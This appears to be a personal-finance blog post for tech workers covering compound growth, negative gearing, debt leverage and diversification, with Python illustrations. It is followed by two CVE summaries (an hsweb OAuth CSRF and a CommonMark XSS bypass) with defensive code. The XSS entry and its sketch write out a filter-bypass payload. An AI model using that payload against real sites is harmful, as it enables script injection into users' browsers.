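Those chart numbers are just compound growth at work, and it's easy to sanity-check them yourself. A minimal sketch (the international shares rate is back-solved from the chart's $85k outcome, so treat all three rates as approximations):

```python
def future_value(principal, annual_rate, years):
    """Compound a lump sum once per year at a fixed rate."""
    return principal * (1 + annual_rate) ** years

# The chart's 30-year outcomes for a $10k lump sum invested in 1988
for label, rate in [("cash", 0.061), ("international shares", 0.074), ("US shares", 0.106)]:
    print(f"{label}: ${future_value(10_000, rate, 30):,.0f}")
```

Run it and the cash rate lands just under $59k while US shares clear $200k, which is the whole point: the rate difference looks small, but three decades of compounding turns it into a 3.5x gap in outcomes.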

An often-heard saying illustrates the value of starting early and allowing time to amplify investments:

It's not timing the market, it's time in the market.

In reality, it's both and buying anything at a low-point is obviously going to net you more dollars than buying at the peak. But the point of all this is that starting young enormously amplifies earning potential and to bring this back around to the tech industry again, those of us in this space have a much better chance than most to earn well at a young age. Let me put some personal context around this:

Almost 9 years ago I wrote a post on a real estate forum looking for feedback and inspiration. We'd bought a lot of property by that time and it became the foundation on which so much of what we've done since has been built. This is the first time I've mixed these two worlds - my background with real estate and my public blogging life as most readers will know it - but it's important context. Do read that post as it goes a long way to explaining why I'm writing this post and indeed, why I have the financial options I do today.

Kylie and I started investing while we were young. We began purchasing real estate in 2003 in our mid-20s and we poured every cent we could save into it. Some purchases were better than others, of course, but the constant theme across all of them was that we knew that good investments made young would pay off big time in the long term. It also created a forced savings plan for us; money in real estate is not "liquid" so you can't readily draw it out of a savings account on a whim and loans need to be paid on time each month or banks start getting cranky. (Incidentally, this is also a strength of home ownership as it's effectively a forced savings plan.) We maximised our borrowing potential, took advantage of every available tax concession and relentlessly pursued more property as soon as we had the savings to put down another deposit. We took risks, but they were calculated and made at a time where we had 2 incomes and no dependants. Everything gets harder when there's kids; more expenses, less time and often, less income if one partner decides to stay at home or work less.

By no means am I saying "go out and put all your money into property", it might be that you start putting a very small amount of money into a share portfolio or managed funds early on, the point is that time amplifies money (at the very least, everyone should understand how compound interest works). That was the single best financial decision we ever made and it happened well before my life as people know it today; there was no Pluralsight, no workshops, no speaking events or Have I Been Pwned or blog sponsorship - nothing. Yet today, that property portfolio is a significant portion of our wealth because even though we weren't earning much money then by comparison, it amplified over and over again.

I want to touch on 2 more things on this because I know they'll come up if I don't mention them. Firstly, if you've passed the age that you might consider "young", the same logic of time amplifying dollars still applies. Obviously, you have less time and there are other considerations such as retirement funds (and associated tax implications); the point is that the earlier you begin on this journey, the better. And secondly, no, this wasn't done with financial support from parents. No deposits were handed out, no financial guarantees were made on our behalf, every single cent had to be earned, saved and then invested. But there was some help we got that moved everything along, and that was with financial literacy.

Lesson 3: Invest in Financial Literacy

I regret many things about my own education at school and university. I regret that I had to learn French in high school. I regret that I had to do chemistry as part of the computer science degree I started and never finished. But most of all, I regret that I was never taught financial literacy. I never learned the importance of the things I've already written in this blog post nor how the share market or property market work or even something as simple as the impact of compound interest on a credit card, something that's at crisis level for many people here in Australia at the moment. These things, to my mind, are essential life lessons and I do hope things have moved on a bit in the education system since then.

But we did have encouragement from our parents when it came to imparting financial advice. The two most notable things that come to mind were my father regularly repeating lesson 1 above (money gives you choices), and Kylie's father helping us understand how the property market works (he worked in the industry). But that was a tiny portion of the education with the vast bulk of it made up of reading books and magazines, going to seminars, hanging out on forums and frankly, also learning by making mistakes. We lost money on shares. We missed opportunities that would have yielded amazing results. We had property deals fall over. We got a lot of stuff wrong, but we got a lot more stuff right.

Part of developing financial literacy is that the more you learn about money, the more conflicting advice you'll get. Last week I tweeted about drafting up this post and I had a number of people contact me with their own tips. One person emailed me with many that aligned with mine, but he also said "only buy properties that you feel you could live in, they are homes as well as investments". I would never want to live in any of our properties we bought as investments. When you buy an investment - any investment - you should be ruthlessly focused on the numbers; what it's yielding, what the growth opportunities are, the tax advantages etc. When you buy a home to live in, you're buying with the heart because a home is a very emotional purchase. That's not to say you can't buy a home that's also a good investment, but you have different priorities and the perfect home for you to live in is almost certainly not the perfect asset for you to invest in. I don't want to live in any of our properties, but they're in high growth areas with good accessibility to public transport and low vacancy rates. Now, that doesn't make me right and him wrong, it's merely an illustration that there are many different views out there and the challenge for you is to understand the reasoning behind them and work out what actually makes sense for you. That knowledge is an investment you have to make.

Financial literacy is a fundamental skill which we all need but few of us genuinely invest in. There are a heap of resources available where you can learn for free and whilst there's frankly a lot of crap out there (there are way too many dodgy characters trying to sell investment opportunities!), it all contributes to the melting pot of information you can absorb. I'm conscious that for most people, developing financial literacy probably seems like a difficult thing that requires a time commitment. And I agree. I found it hard and I found a huge amount of my time being spent on it, but I do believe that we, fellow geeks, have some advantages here.

Those of us in the tech industry are used to seeking out information online. Crikey, I still use Google every time I need to write text to a file in C#! We're also used to engaging with others online in order to learn, we've been doing it on Stack Overflow for years and we can do it on any number of investment forums, debt support communities or other resources designed to help educate in the same way as the tech ones we're so dependent on. I made 414 posts on the property forum I referenced earlier, more than all my questions and answers on Stack Overflow combined.

If you're not sure where to start on this, there's one area of financial literacy that is absolutely essential to understand, and that's tax.

Lesson 4: Learn the Tax System

There's a very famous clip of Kerry Packer (for many years, Australia's richest person), who was questioned about his tax practices in court back in '91. This is worth a quick watch (it's 2 minutes):

The key sentence being the last one in that clip:

Now, of course I am minimising my tax and if anybody in this country doesn't minimise their tax, they want their heads read because as a government, I can tell you you're not spending it that well that we should be donating extra.

Regardless of what you may think of the tax practices of billionaires, it's hard to argue with that statement (it's also hard not to chuckle just a little!). Tax is bloody complicated stuff yet it's something we all need to deal with in one way or another. It also consumes a significant chunk of your income and that only increases as you earn more and spend more. Understanding how your local tax system works is an absolutely essential part of that financial literacy I was just writing about.

For example, in Australia we have pretty attractive negative gearing tax laws for real estate and I'll steal the definition off Wikipedia to explain precisely what that means:

Negative gearing is a form of financial leverage whereby an investor borrows money to acquire an income-producing investment and the gross income generated by the investment (at least in the short term) is less than the cost of owning and managing the investment, including depreciation and interest charged on the loan (but excluding capital repayments).

What this has meant for us is the ability to buy property and claim deductions for non-cash expenses (that is they're not actually coming out of your pocket) thus reducing our taxable income and ultimately increasing our take-home pay. For example, buildings, fittings and fixtures all "depreciate", that is their value decreases over time. Think about curtains - they wear out and need to be replaced and the Australian tax system affords you the ability to claim that depreciation before you actually need to spend the dollars. Your country may well have different laws, but the point is that tax constructs exist to help you legally reduce the amount payable. (Side note: there have been calls for years to abolish negative gearing in Australia in this fashion and there were indeed pretty significant changes made in the '80s... then rolled back.)
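As a rough sketch of how that mechanic plays out (all figures hypothetical, and this is an illustration of the arithmetic, not tax advice):

```python
def negatively_geared_outcome(rent, cash_expenses, depreciation, salary, marginal_rate):
    """Illustrate negative gearing: a paper loss on the property (including
    non-cash depreciation) reduces taxable income at the marginal rate."""
    property_result = rent - cash_expenses - depreciation   # negative = geared loss
    taxable_income = salary + property_result
    tax_saving = -property_result * marginal_rate if property_result < 0 else 0.0
    return taxable_income, tax_saving

# Hypothetical: $20k rent, $24k cash costs, $6k depreciation, $100k salary, 37% rate
taxable, saving = negatively_geared_outcome(20_000, 24_000, 6_000, 100_000, 0.37)
print(taxable, saving)  # taxable income drops to $90k; $3,700 less tax payable
```

Note that only the depreciation slice of that $10k loss is "free": the $4k cash shortfall still comes out of your pocket each year, which is exactly why the strategy only works when paired with capital growth.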

Retirement funds are another great example. In Australia, our "superannuation" scheme (think 401k in the US) makes it very attractive to contribute extra cash at a low tax rate. Only up to a threshold, that is, and even that changes based on your age, but again, there are constructs designed by the government to help everyone maximise the effectiveness of the dollars they earn by minimising the amount of tax payable on them.

Tax is also where professional help is really important. Unless you're on a very low income that's just a simple wage from an employer, in my experience the ROI of professional guidance means it makes sense to get a good accountant early. Especially once there's more money involved, a very small percentage difference made by a taxation professional easily covers their cost (you may well find that's an allowable deduction too). Over time, our accountancy needs changed from a basic accountant we saw once a year to a larger scale firm we call on regularly. Your needs may well change too as you move through different phases of life, but get someone you can trust and get them early.

Optimising your tax position is free money. Free legal money and there are many, many ways to do it. In this industry, there's everything from income-producing equipment to conferences to charitable donations to an organisation like Let's Encrypt that can reduce your tax bill (obviously get expert advice on this if you're not sure). Sometimes, it's even just as simple as deferring tax that's payable so that you have access to the money for longer and can reap the benefits of the interest it earns. Pay your taxes, but don't donate extra.

Lesson 5: Know Good Debt from Bad Debt

The word "debt" immediately has negative connotations for a lot of people. Many of those people have a bunch of "bad" debt and little or no "good" debt. The latter term might sound paradoxical, but I'll get back to that. Let's start with the bad stuff.

Bad debt is the kind you have on a credit card. It's almost always accrued on a depreciating asset (for example, a new TV) and it's very often at a high interest rate. A credit card in Australia right now can easily run you around 20% per annum which means that not only are purchases going to cost way more than the sticker price (assuming the card isn't paid off each month), but the value of the purchase is also heading south leaving you with negative equity (you owe more than the thing is worth). Because credit cards have such a high rate on them, the single best investment you can make right now is almost certainly to pay off any debt you have on a card as fast as possible. Think back to that Vanguard chart - the highest yielding shares they had there (the US ones) were growing at 10.6% and paying off a credit card can effectively earn you double that. (Side note: that last sentence isn't entirely accurate as income earned on investments is usually subject to tax whereas paying off consumer debt will often have no tax obligations at all. Or if we go even deeper down the rabbit hole, those US shares at 10.6% include capital gains and that's something you may only pay tax on when you sell. So in other words, both the points made in this side note make the investment value of paying off credit card debt even more important than investing in other asset classes.)
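To see why paying off the card beats investing, compare the two growth curves side by side. A quick sketch with made-up figures (real cards compound daily or monthly and rates vary):

```python
def balance_after(principal, annual_rate, years, compounds_per_year=12):
    """Grow a balance with periodic compounding."""
    r = annual_rate / compounds_per_year
    return principal * (1 + r) ** (compounds_per_year * years)

# $5k left sitting on a 20% p.a. card vs $5k invested at the chart's 10.6%
card_debt = balance_after(5_000, 0.20, 3)        # compounds against you, monthly
investment = balance_after(5_000, 0.106, 3, 1)   # annual compounding
print(round(card_debt), round(investment))
```

After three years the card balance is north of $9k while the investment is under $6.8k: the debt grows faster than the asset, so every dollar thrown at the card is a guaranteed, tax-free "return" the market can't match.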

Payday loans are another prime example where you have fast, easy access to cash but pay an astronomically high interest rate for the privilege. For example, via Nimble, one of Australia's most prominent short-term lenders:

[Image: Nimble's advertised short-term loan rates]

What does that look like in actual dollar terms? Let's imagine you need a couple of thousand for 12 weeks:

[Image: Nimble's repayment figures for a $2,000 loan over 12 weeks]

I highlighted the most important part in red because for some reason it was very small and a bit hard to read... In other words, for a loan that's less than a few months long you pay back an additional 32% over what you actually borrowed in the first place. This, in effect, makes whatever it is you bought with that money 32% more expensive. And yes, I know that many people are under financial duress and may not have other options; the point is to understand what the actual impact of this debt really is. Remember also that compound interest works on debt too, not just savings. The longer you run with debt, the more you pay. (Side note: I watched a really interesting Netflix documentary on short term loans recently as part of their Dirty Money series - check out the Payday episode.)

Good debt is an investment. All our property purchases, for example, have loans not only because we simply couldn't have afforded to pay cash at the time, but because debt can give you leverage. Rather than paying, say, $250k in cash, you'd put down, say, a 10% deposit and pay perhaps 5% per annum in interest. You then have cash flow from the asset (rent paid by tenants) and as mentioned earlier, there may also be non-cash deductions that give you taxation benefits. You also have expenses, primarily loan repayments but also maintenance, council rates, insurance and possibly strata and property management fees. I don't want to go down that rabbit hole here (we're getting back to the importance of financial literacy again), but the point is that debt can be used to build wealth in an accelerated fashion. (Incidentally, the same approach can be used in shares and managed funds, this is not just the domain of real estate.) Borrowing for education can also be good debt. Kylie and I both had student loans via HECS in Australia which we had to pay off as we began earning money. This was an investment in our future and the return on the investment was an education.
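A quick sketch of that leverage effect with made-up round numbers (interest-only loan, running costs folded into a net rental yield, buying costs and tax ignored):

```python
def leveraged_return(price, deposit_pct, growth_pct, interest_pct, net_yield_pct):
    """One-year return on cash invested when the asset is bought with debt."""
    deposit = price * deposit_pct
    loan = price - deposit
    profit = (price * growth_pct          # growth accrues on the whole asset
              + price * net_yield_pct     # net rent after expenses
              - loan * interest_pct)      # but you pay interest on the loan
    return profit / deposit

# Hypothetical: $250k property, 10% down, 5% growth, 5% interest, 3% net yield
print(leveraged_return(250_000, 0.10, 0.05, 0.05, 0.03))   # 0.35, i.e. 35% on cash
```

Bought outright, the same property returns 8% (5% growth plus 3% yield); geared at 10% down, it returns 35% on the cash actually invested. Flip the growth to -5% and the same gearing produces a -65% return on that deposit, which is the amplified-loss side of the coin.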

This isn't to say that "good" debt is always a smart idea and in some cases, it can amplify losses dramatically. Some of the properties we bought were only several years old and were being sold for 30%+ less than the original owners had paid. Developers often entice buyers by offering "honeymoon" interest rates and rental guarantees that make the cash flow position look very positive to the unsophisticated investor. However, once those expired and the penny dropped that the properties were no longer financially sustainable (interest rates went up, rent went down), they became distressed sales and the unfortunate purchasers learned that the market valued the properties at a very different mark to what the developers had been selling them for. Suddenly, the 5% deposit they paid to get access to real estate had turned into negative equity six times its size.

Conversely, what we might traditionally consider "bad" debt can be good and I'll give you an example of that. This whole post kicked off with me talking about a car and as much as I love them, let me be really clear about this: fancy cars are one of the worst possible things you can ever spend your money on! They're functionally equivalent to models that are a fraction of the price, they depreciate very rapidly and they have a bunch of acquisition costs that disappear into thin air the moment you buy them (stamp duty, for example). But those are principles I understand very well so I make purchases with full consciousness of the financial impact. The point re bad debt potentially being good is that whilst a car is a depreciating asset, we've had cars in the past where the manufacturer's interest rate was far more attractive than the interest we could earn on that money elsewhere, which made paying cash a sub-optimal use of funds. You need to be careful that an attractive interest rate isn't just capitalised into the purchase cost of the vehicle (and I've definitely seen that before), but the point is that debt can be used in a variety of constructive ways and some of them may be unexpected.

Over and over again, we come back to financial literacy and a big part of that is understanding not just how to use debt efficiently, but how to manage the risk it creates. I reckon as technical folks we tend to be more analytical than your average person and one of the best things you can do for your financial wellbeing is to chuck everything into spreadsheets. This debt situation, for example, can be really multifaceted so if you're looking at taking out a loan, put everything into Excel and analyse the bejesus out of it; cash flow impact, capital gain / loss, opportunity cost (what else you could do with the deposit and repayments), etc, etc. I've had many occasions in the past where I've literally sat down and written all my analysis in C# because I understood the code better than the finances! But by doing that, you learn, and that's a great way of working on financial literacy. (Side note: services like Mint are also a great way of tracking your financial position.)
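As a sketch of the kind of analysis being described here - all figures hypothetical - a few lines of code can stand in for the spreadsheet:

```python
# A hypothetical investment-loan cash flow analysis, the kind of thing you
# might otherwise build in Excel. All figures are made up for illustration.
purchase_price = 300_000
deposit = 30_000
loan = purchase_price - deposit
interest_rate = 0.05           # interest-only, per annum
weekly_rent = 350

annual_rent = weekly_rent * 52
annual_interest = loan * interest_rate
annual_expenses = 5_000        # rates, insurance, maintenance, management

# Negative cash flow means the asset costs money to hold each year,
# a bet that capital growth will outweigh the holding cost.
net_cash_flow = annual_rent - annual_interest - annual_expenses

# Opportunity cost: what the deposit could have earned elsewhere (say 4%).
alternative_return = deposit * 0.04

print(f"Annual net cash flow: ${net_cash_flow:,.0f}")
print(f"Opportunity cost of the deposit: ${alternative_return:,.0f}")
```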

Lesson 6: Diversify Earning Potential and Risk

This one starts to get to the heart of where money comes from and how to protect it. In this industry specifically, we have much better potential than most both to earn it and to keep it - let me explain.

Traditional incomes generally boil down to trading time for money from a single source (your employer). It certainly did for me for many years and in my case, it meant going into Pfizer each day, doing my architecty thing and receiving a monthly pay check. As we've already established further up, a software architect in this industry can do quite well but this traditional means of working does create risk and I saw that manifest itself through many rounds of redundancies over the 14 years I was there. I'd see the stress people went through as their roles were cut and they were out of a job and there were 2 main reasons for that:

  1. Their job was their sole source of income and if it went, so did their cash flow (in some cases, it was the sole source of income between both them and their partner who may be a stay at home parent)
  2. They were worried about their ability to get another job which, again, would also have a pretty significant cash flow impact

We went through that stress ourselves; about 7 years ago Kylie's job was made redundant. She was 6 months pregnant (seriously, who does that to a pregnant woman about to go on maternity leave?!) and it was entirely unexpected and left us with a very uncertain future. Fortunately, we had my income to cover us and we'd obviously planned in advance for the maternity leave, but it still rocked us.

So let's drill down on this "diversify earning potential" concept and the first point I want to make on that is about your own personal marketability. My very first blog post ever was Why online identities are smart career moves and a cornerstone of that post was that you never know when you might be looking for another job. Making yourself marketable isn't something you can do well at the drop of a hat; it can take significant effort and it's something you need to plan for in advance. You might not necessarily think of that as a personal finance tip, but it can have a fundamental impact on your ability to earn money.

Here's a perfect example that illustrates my point: when I first interviewed for the Pfizer job in 2001, I showed a pet project I'd built. It was a classic ASP and Access database (stop laughing) project that managed photos I'd taken. It was very basic, but it gave me something to show that demonstrated work in the field. I clearly remember showing my boss's boss the work and him being impressed by it, despite its simplicity. This was a personal project done on my own time as part of my own education and it played an important part in landing me the job I had for the next 14 years. That's the job that contributed significantly to the investment portfolio!

Pet projects, open source contributions, robust Stack Overflow profiles, local user group engagements and a raft of other things you can do in your spare time all contribute to marketability and in turn, diversify your earning potential. (Incidentally, the talk I referenced earlier on Hack Your Career covers all of this in more detail.) This is one of the great advantages we have in this industry in that it's so easy to expand our professional repertoire in our spare time. I'll give you an example of the antithesis of that: One of the people I saw forced into redundancy at Pfizer was in a senior role they'd been in for a very long time (I'm going to be a little vague here in case they read this) and frankly, they really had very little (any?) industry experience outside of that. They were proficient at their job but they really didn't have skills that were transferable across the industry and when the redundancy finally came, they were out of work. Permanently. They ended up re-skilling in another industry in what was quite a stressful time for them.

Moving on, another great attribute of tech is the ability to diversify income sources. Now, I'm conscious there are cases where the employer may prohibit some of these things (even on personal time) but as an example, I did a lot of small independent website projects whilst in my corporate role. Nights, weekends, holidays were often spent building brochureware websites or other little pieces of work that could earn income. Independent income which would contribute to our financial wellbeing. That money then went into the property portfolio and grew further so think about the leverage that provided: the extra money earned was nice in and of itself, but that was then used to borrow money (so it was leverage) which bought appreciating assets. Those nights, weekends and holidays ultimately became very valuable.

In 2012, I started creating what many people came to know me by: Pluralsight courses. Again, something that could be done independently without conflict with my day job. There are many, many little opportunities like this which can actually contribute to both the points made in these last 2 paras, namely diversifying your experience and actually generating income. Today, no more than about 20% of our income comes from any one source which is enormously important in terms of diversification. It means that, for example, if Pluralsight goes down the toilet then yes, I'd be very upset by that but no, it wouldn't be a life-changing event.

Which brings us to risk. Risk is reduced when you have more choices and it's reduced again when you have more sources of income. Drawing it back to investment strategies, you'd never proverbially put all your eggs in one basket by, say, putting all your cash into one stock. Using all your savings to buy that one magic bean, so to speak. When we bought real estate, we bought at a level that would enable us to diversify; I'd rather have 2 small apartments in different suburbs than 1 house because it gives you insurance against everything from tenant vacancies to repairs that need to be made to something extreme like the place burning down. And you definitely don't want all your exposure in one asset class either; property, shares, cash and all sorts of other investment vehicles enable you to spread risk. Try a Google search for life savings lost in investment scheme and you'll understand why this is so important.

Invest in diversifying your earning potential and your assets such that it reduces your risk.

Lesson 7: Prepare for Luck

When I started drafting this blog post all those years ago, one of the things I immediately thought of was this book:


Malcolm Gladwell is a sensational author and his previous books The Tipping Point and particularly Blink are absolute must reads. But what I particularly liked about Outliers is how he systematically broke down the factors that contributed to the success of very noteworthy people such as Bill Gates, The Beatles and even elite athletes. On that final point, let me draw an extract from Wikipedia that illustrates one of the success factors Gladwell identified:

The book begins with the observation that a disproportionate number of elite Canadian hockey players are born in the earlier months of the calendar year. The reason behind this is that since youth hockey leagues determine eligibility by calendar year, children born on January 1 play in the same league as those born on December 31 in the same year. Because children born earlier in the year are statistically larger and more physically mature than their younger competitors, and they are often identified as better athletes, this leads to extra coaching and a higher likelihood of being selected for elite hockey leagues.

There are 2 ways of thinking about this as it relates to success factors and the first is that elite hockey players are exceptionally talented. Regardless of the other opportunities that were granted to them, you simply can't play at that level unless you're at the absolute top of your game. The second is the real insight in this piece and it's that the older kids have a natural advantage due to those extra months of growth. An unfair advantage, some would argue, but an advantage all the same. But it wasn't all luck either - there's plenty of kids born in January that can't compete with much younger players because they simply don't have the natural talent or the family support or the dedication to train or whatever else it may be. Being successful at that level requires both luck and talent.

Bill Gates is worth a mention as it ties in nicely with the tech-centric theme of this post. Yes, he's obviously a super smart bloke, but it was his (very fortunate) access to computers courtesy of his mother's job that amplified that talent and enabled him to build Microsoft. And this is really the point I'm getting at in this lesson: we all come across fortuitous situations - "luck", if you will - and you need to be prepared to take advantage of those opportunities. Those situations may be anything from a sudden job opportunity to a chance investment, both of which often require preparation to capitalise on. For example, do you have a presentable resume and references for that chance job? Do you have up to date tax returns and financial statements for the investment? Are you able to leverage the skills and the assets that you have - that we all have - to take advantage of these opportunities when they arise? I certainly haven't always and I lament the ones I missed because I simply wasn't prepared.

I vehemently dislike seeing successful people referred to as "lucky" or "fortunate" without further context. Not because they're inherently wrong words to use, but because they imply people achieved that success by chance. It must also be disheartening for others who don't believe they're as lucky or as fortunate themselves which is why I love this quote:

I am a great believer in luck. The harder I work, the more of it I seem to have.

There's debate about who originally said it but it doesn't particularly matter as the sentiment rings true regardless. What I hope people take away from it is an acknowledgement that hard work and preparation amplify the luck that we all come across from time to time.

One more thing on the whole "luck" piece because it will come through in comments if I don't address it: Just as the older hockey players benefited from the month they were born in, I've benefited from factors I was born into. My gender. My ethnicity. The country I was born in. Even the countries I've lived in; I spent the last few years of high school in Singapore which was an absolute tech mega centre compared to most of the rest of the world in the early to mid-90's when I was there. A chance meeting at the local windsurfing club with a guy working for a satellite systems engineering company in '92 got me my first part time job in technology. These are factors I had no control over, but I amplified that good fortune by working my butt off when I was given the chance. Whatever your circumstances, the essential lesson still holds: opportunities will present themselves over time, and being prepared to leverage them matters.

Lesson 8: Put a Price on Your Time - and Your Family

I stopped playing video games probably about a decade ago. Half Life 2 was my game of choice at the time and I could easily blow a few hours fragging everything that moved. Whilst it certainly wasn't at an addiction level, it was still enough time spent that eventually it dawned on me that it simply wasn't a good way to invest my hours. Now I want to be clear about something here too: investments aren't always of a monetary nature, they can be investments in your health or your mental state or your family and as it stands today, I spend more time playing tennis each week than I did fragging. But the return on that investment is so much greater for my mental state and my health than what HL2 ever was.

To the point about putting a price on your time, I realised holistically I was much better off focusing on our investments and my own personal development than I was spending the time gaming. As time has gone by, I've become more and more conscious of what the value of my time is. Sometimes it's a clear monetary value; I charge companies to run security workshops which is a direct exchange of time and money. Other times it's much less tangible but it feels like it's moving things along in the direction I want them to go. This blog post is a perfect example of that insofar as it will make me zero dollars directly but I feel like it's the right thing to do because it has the potential to improve life for others. Understanding the value of time (and particularly how it changes over the years) has also helped me decide where to spend money to buy back hours; a house cleaner a couple of times a week, someone to wash the cars, business class airfares.

Then there's putting a price on your family. People hate it when I use this term - "what do you mean I should put a price on my family, my family is priceless!" - and they continue to hold that position as they head off to the office each day. The reality is that we all trade time with our families to partake in activities that enable us to actually support them, but most people don't favour thinking about it in those terms. It doesn't have quite the same ring to it, but perhaps a more accurate title would be "consider how much family time you're willing to sacrifice for your prosperity and how long you're willing to wait for that investment to pay off". If you don't have a family to consider, put it in terms of other personal activities you're willing to trade; I traded gaming, others might trade social activities or a holiday or some other form of sacrifice that results in them working towards their own prosperity.

What I mean by putting a price on your family is that you should work out when it makes sense to prioritise spending time with them and when it makes sense to invest time to focus on other things. For many people, there’s no desire to commit anything more than 40 hours a week to earning a living and that’s just fine, so long as the lifestyle that gives them is consistent with the one they want and they're not left unfulfilled as a result. What drives me nuts is when you see people wistfully longing for certain financial or lifestyle goals yet being unwilling to make the sacrifices to get there (more on that in the next lesson).

My balance has changed over time. In the earlier years of my career when I was mostly on hourly contracts, it would be 11-hour days most of the time because surprise, surprise, that pays a lot more than 8-hour days (and remember, that went into leveraged assets that then grew in value over many years). It was fine before kids too, when Kylie was either studying or building her own career with similar hours; we both just knuckled down and got on with it. It’s always going to be harder with kids, particularly because higher workloads are inevitably passed onto your spouse if you’re the one doing the extra career things. What I'm finding now is that because we made those sacrifices before kids were around, we're enjoying the pay-off while they're still young.

If nothing else, at least consciously make choices about where time is spent and one of the best things that'll help you do that is to have a goal.

Lesson 9: Have a Goal

The best way I can explain this is to share a speech by Arnold Schwarzenegger. Invest 12 minutes listening to this:

Don't waste your minutes. Work your arse off. You have 24 hours in a day, you sleep 6 of them, maybe you burn 12 with work and travel so now you have 6 hours left. You eat / schmooze a little, but you see how much time is left.

If you don't have a vision of where you're going, if you don't have a goal where you go, you drift around and you never end up anywhere.

A goal keeps you focused. A goal drives you to invest time in working towards something. A goal makes you relish the pain required to achieve it. Schwarzenegger talks about the physical pain of reaching his goals, but also about improving knowledge by investing time which aligns with what you've read here. Now, clearly he took a very extreme approach to reaching his goal because it was an extreme goal. I'm not saying everyone should go out and spend every spare moment figuring out how to maximise their dollars, but what I am saying is that you need to know why you're doing this - what you're working towards - and depending on how lofty that goal is, it may indeed take a significant amount of effort over a long period of time.

In this industry, we work with goals the whole time and we've all worked with tools that help enable us to hit them. We have backlog items that need to be completed and they can just as well be things like getting your insurances in order, assessing your retirement strategy (yes, even when you're young) or setting a learning objective. We deliver work units in sprints and when you have a long-term goal, there's going to be many individual sprints within it. Kylie and I continually have retrospectives; what's working, what's not, what do we need to do differently. And if we really want to draw out the agile analogies, nothing requires adaptive planning like your financial future does because there are so many environmental factors that change; your job, your family structure, interest rates and any number of other things that require a course correction. We, tech friends, understand this. This is what we do day in and day out and you can extend that to your personal financial prosperity.

Inevitably, we all have multiple goals and they'll change over time too; for many years whilst I was living in Sydney and working for Pfizer, my goal was to gain independence and move back to the Gold Coast where my family was. In 2015, we did that.

So, I made new goals. I've certainly had others too and they haven't always been this long-term or life-changing. For example, I've had goals for certain cars I've wanted and in some cases, it's taken many years to achieve them. In other cases, I'm yet to achieve them but they're still there on the horizon, driving me forward and giving me direction.

Goals can be very personal; perhaps your goal is to retire young. Maybe it's to support your extended family. It might even be to give as much as you can to charity (Gates is a perfect example of that) and all of those are just fine, but have a goal because without that... you drift.

Lesson 10: Financial Prosperity is a Partnership

I wanted to finish on this point because it's absolutely pivotal to making all the previous ones actually work. If you're in a partnership with someone (wife, boyfriend, whatever), perhaps the most valuable advice I can give is that you must approach financial prosperity as a partnership with a shared vision. If you're not aligned - if you have fundamentally different objectives - you won't be able to give your goals the focus they deserve.

I think back to friends I've seen in the past struggle with this. For example, one partner becomes resentful of the amount the other is spending on personal indulgences. Or they resent the family sacrifices the other is making. Or one is satisfied with a subsistence living whilst the other dreams of millions. Lack of alignment not only makes achieving financial objectives difficult, it can drive a wedge right through the middle of a relationship and I'm sure we've all seen many fail simply because the couple don't see eye to eye on fundamental issues.

I'll give you a few examples of what I mean and the first one that came to mind (for some strange reason) was when Kylie and I were planning a family. Like most couples, there comes a time where that's on the cards and for us we started talking seriously about it in 2008. As we began planning, we literally went to a quiet spot in a local restaurant with a laptop and drew up a spreadsheet of what having a baby would mean. We did this together and planned everything from loss of income due to maternity leave, government parental benefits, the taxation implications of both and even medical expenses and the maintenance cost of a child. I'm sure we didn't get that all spot on (the last one in particular), but the point is that we made a financial decision together (and having a kid is a very big financial commitment) with as many of the facts as possible in front of us.

That partnership extends to everything from the investments we make to the travel I do to the insurances we have (NB: things like income protection and life insurance are another one of those financial literacy things). This isn't just to ensure alignment, it's also a great sanity check. If you're in a relationship, you'll probably find there are aspects of this whole financial prosperity thing that each of you does better than the other; I'm "big picture" and number orientated, Kylie is detail-focused and frankly, much more patient than me! Explaining things to each other has a way of ensuring you stay on track.

But perhaps even more importantly than all of that, relationships are meant to be a partnership. A journey you take together. Hopefully a very long journey that requires planning and there are few more fundamental relationship issues than how you view money.


If you're working in tech, you're working in one of the best-paid industries with the greatest growth potential and career prospects out there. Your financial potential almost certainly exceeds that of most people around you. You're already winning just by being here and my hope is that whilst the first tweet in this post might have provided motivation, the post itself helps provide inspiration.

Feel free to ask questions in the comments section below and I'll answer what I can. Also - and I trust this was obvious already - do treat this post as a reflection of my own views and experiences and get professional advice where necessary.

CVE-2018-20595 (hsweb)

A CSRF issue was discovered in web/authorization/oauth2/controller/ in hsweb 3.0.4 because the state parameter in the request is not compared with the state parameter in the session after user authentication is successful.
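For context, the standard mitigation is the OAuth 2.0 `state` check that the CVE says is missing. A minimal, framework-agnostic sketch in Python (not hsweb's actual code; the session is modelled as a plain dict and the function names are illustrative):

```python
import hmac
import secrets

def begin_authorization(session: dict) -> str:
    # Before redirecting the user to the authorization server, generate an
    # unguessable state value and remember it in the user's session.
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state  # include as the `state` query parameter in the redirect

def handle_callback(session: dict, returned_state: str) -> bool:
    # On the callback, the state echoed back by the authorization server
    # MUST match the one stored in the session. Skipping this comparison
    # (as in the vulnerable version) is what enables the CSRF attack.
    expected = session.pop("oauth_state", None)
    if expected is None or not hmac.compare_digest(expected, returned_state):
        raise PermissionError("state mismatch: possible CSRF")
    return True  # safe to exchange the authorization code for a token
```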

CVE-2018-20583 (commonmark)

Cross-site scripting (XSS) vulnerability in the PHP League CommonMark library versions 0.15.6 through 0.18.x before 0.18.1 allows remote attackers to insert unsafe URLs into HTML (even if allow_unsafe_links is false) via a newline character (e.g., writing javascript as javascri%0apt).
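The root cause is a scheme check defeated by embedded control characters, since browsers strip characters like newlines when parsing a URL's scheme. A rough Python illustration of the flawed versus fixed check (not the library's actual implementation):

```python
import re

DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")

def is_unsafe_naive(url: str) -> bool:
    # Vulnerable approach: a plain prefix check misses "javascri\npt:..."
    return url.lower().startswith(DANGEROUS_SCHEMES)

def is_unsafe_fixed(url: str) -> bool:
    # Strip ASCII control characters (including newlines), approximating
    # what browsers effectively do, before comparing the scheme.
    normalized = re.sub(r"[\x00-\x1f\x7f]", "", url).lower()
    return normalized.startswith(DANGEROUS_SCHEMES)

payload = "javascri\npt:alert(1)"
print(is_unsafe_naive(payload))  # False - the newline defeats the check
print(is_unsafe_fixed(payload))  # True  - normalization catches it
```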

Hackers steal personal data from 997 North Korean defectors

